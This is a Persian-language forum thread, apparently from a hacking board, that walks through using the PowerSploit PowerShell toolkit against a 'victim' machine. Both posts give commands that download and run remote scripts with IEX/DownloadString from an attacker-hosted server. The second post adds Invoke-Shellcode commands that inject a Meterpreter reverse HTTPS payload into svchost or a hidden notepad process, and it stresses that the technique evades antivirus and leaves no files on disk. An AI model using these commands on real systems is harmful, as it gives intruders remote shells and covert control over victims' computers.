SpareNet Servers Advertising & Link Exchange

اطلاعیه

بستن
هیچ اطلاعیه ای هنوز ایجاد نشده است .

PowerShell ToolKit: PowerSploit

بستن
X
 
  • فیلتر
  • زمان
  • نمایش
پاک کردن همه
نوشته‌های جدید

  • PowerShell ToolKit: PowerSploit

    با سلام خدمت شما دوستان عزیز
    powersploit یک مجموعه ابزار از powershell است که متوان از آن برای انجام عمل اکسپلویتنگ، گسترش اکسپلویت و یا پن تست استفاده کرد.
    برای دریافت آخرین نسخه‌ی این مجموعه را میتوانید از این آدرس دریافت کنید: https://github.com/mattifestation/PowerSploit
    اگر شما از git استفاده میکنید میتوانید به راحتی با استفاده از دستور زیر تمامی فایل‌های آن را دریافت کنید:



    کد:
    git clone [url]https://github.com/mattifestation/PowerSploit.git[/url]
    [align=center][/align]برای استفاده از این مجموعه شما باید Microsoft PowerShell رو نصب داشته باشید. این ابزار در ویندوز 7 و بالاتر به صورت پیشفرض نصب شده و نیازی به نصب دوباره آن نیست.
    در اینجا سناریوی ما به این صورت است که ما یک ریموت دسکتاپ کانکشن از سیستم قربانی داریم و قربانی هم PowerShell را نصب دارد و ما PowerSploit را روی سیستم قربانی اجرا میکنیم.
    برای دسترسی راحت تر به این ابزار ما یک سرور ساده بر روی سیستم خود اجرا میکنیم که بتوانیم از طریق آن PowerSploit را روی سیستم قربانی نصب کنیم


    کد:
    python -m SimpleHTTPServer
    [align=center][/align]
    حال تمامی فایل های مورد نیاز PoweSploit در آدرس http://<ip_address>:8000 قابل دسترسی است.[align=center][/align]پاوراسپلویت تمامی ابزار های خودش را به صورت کاملا شفاف و واضح به صورت زیر دسته بندی کرده است.
    Category Description
    Antivirus Bypass پیدا کردن بایتی که با امضاء یک ویروس مطابقت دارد و توسط آنتی ویروس شناسایی میشود!
    Code Execution برای اجرای کد بر روی سیستم قربانی استفاده میشود
    Exfiltration جمع آوری اطلاعات و داده ها از سیستم قربانی
    Persistence حفظ دسترسی به سیستم قربانی
    PE Tools Handy PowerShell cmdlets for enumeration.
    Recon انجام کارهای شناسایی با استفاده از سیستم قربانی
    Reverse Engineering راهنما انجام مهندسی معکوس و تجزیه و تحلیل نرم افزارهای مخرب. این در حال حاضر به PowerShellArsenal منتقل شده است
    Script Modification ساخت و توسعه یک اسکریپت در سیستم قربانی
    نحوه نصب و اجرای پاوراسپلویت به صورت زیر است:

    کد:
    IEX (New-Object Net.WebClient).DownloadString(“[url=http://%3Cip_address]http://<ip_address[/url]>/full_path/script_name.ps1”)
    زمانی که این دستور اجرا شود پاوراسپلویت بر روی پاورشلی که فقط در حال اجرا است نصب میشود!!

    ادامه دارد...
    [align=center]My Email: [email protected]
    [/align][align=left]mov problems,hell
    sub me,pain
    add me,love
    inc pleasure
    inc adrenaline
    push limits
    call hopeForAbetterTomorrow[/align]

  • #2
    RE: PowerShell ToolKit: PowerSploit

    Invoke-Shellcode
    این افزونه cmd برای inject کردن یک شل کد یا یک پیلود متااسپلویت در یک پروسس جدید یا یک پروسس که از قبل وجود دارد استفاده میشود.
    مزیت استفاده از این اسکریپت این است که آنتی ویروس نمیتواند آن را پرچم گذاری کند و اینک هیچ فایلی بر روی دیسک نوشته نمیشود!
    ما به سادگی میتوانیم این افزونه را که در Code Execution وجود دارد را با این دستور نصب کنید:

    کد:
    IEX (New-Object Net.WebClient).DownloadString(“http://10.0.0.14:8000/CodeExecution/Invoke-Shellcode.ps1″)
    کد بالا را در PowerShell وارد کنید تا این اسکریپت بر روی سیستم قربانی نصب شود.[align=center][/align]
    برای دریافت اطالاعات بیشتر در مورد این اسکریپت میتوانید دستور زیر را اجرا کنید:



    کد:
    Get-Help Invoke-Shellcode
    [align=center][/align]
    تزریق (inject) کردن یک پیلود در پروسس پاورشل و دریافت یک Meterpreter Reverse HTTPS shell:


    کد:
    Invoke-Shellcode -Payload windows/meterpreter/reverse_https -Lhost 10.0.0.14 -Lport 4444 -Force
    [align=center]

    [/align]همچنین ما باید یک Multi Handler exploit را در متااسپلویت برای ردیافت شل از دستور بالا تنظیم کنیم. اجرای دستور بالا به ما یک شل از سیستم قربانی خواهد داد.[align=center][/align]
    به یاد داشته باشید که در زمان نوشته این مقاله تنها دو عدد از پیلود های متااسپلویت توسط این اسکریپت ساپورت میشوند:[align=left]windows/meterpreter/reverse_http[/align][align=left]windows/meterpreter/reverse_https[/align]همیچنین شما میتوانید به یک پروسس جدید یا یک پروسسی که از قبل وجود دار پیلود را تزریق و اجرا کنید.

    Inject in an existing process:
    برای این کار شما باید اول شماره پروسس مورد نظر یا PID را با استفاده از این دستور یادداشت کنید: “Get-Process” (بدون دابلکوتیشن)[align=center][/align]
    توجه کنید که ستون ID همان PID مورد نظر ماست.
    خوب در اینجا ما پیلود خودمون رو به پروسس "svchost" تزریق میکنیم،با PID 1228. اگه به کامند این دستور دقت کنید میبینید که سویچ -force از انتهای دستور حذف شده به این دلیل که برای شروع این کار از کاربر اجازه بگیرد.[align=center][/align]
    بعد از تزریق شل کد با یک Meterpreter shell از سیستم قربانی دریافت میکنیم که در تصویر زیر نشان داده شده است:[align=center][/align]
    Inject in a new process:
    این هم نحوه ایجاد یک پروسس مخفی و تزریق شل کد در آن که در تصویر زیر نشان داده شده است:

    کد:
    Start-Process c:windowssystem32notepad.exe -WindowStyle Hidden
    [align=center] [/align]
    و پس از اجرای این دستور باز هم ما یک Meterpreter shell از سیستم قربانی داریم:
     [align=center][/align]
    ادامه دارد ....
    [align=center]My Email: [email protected]
    [/align][align=left]mov problems,hell
    sub me,pain
    add me,love
    inc pleasure
    inc adrenaline
    push limits
    call hopeForAbetterTomorrow[/align]

    نظر

    صبر کنید ..
    X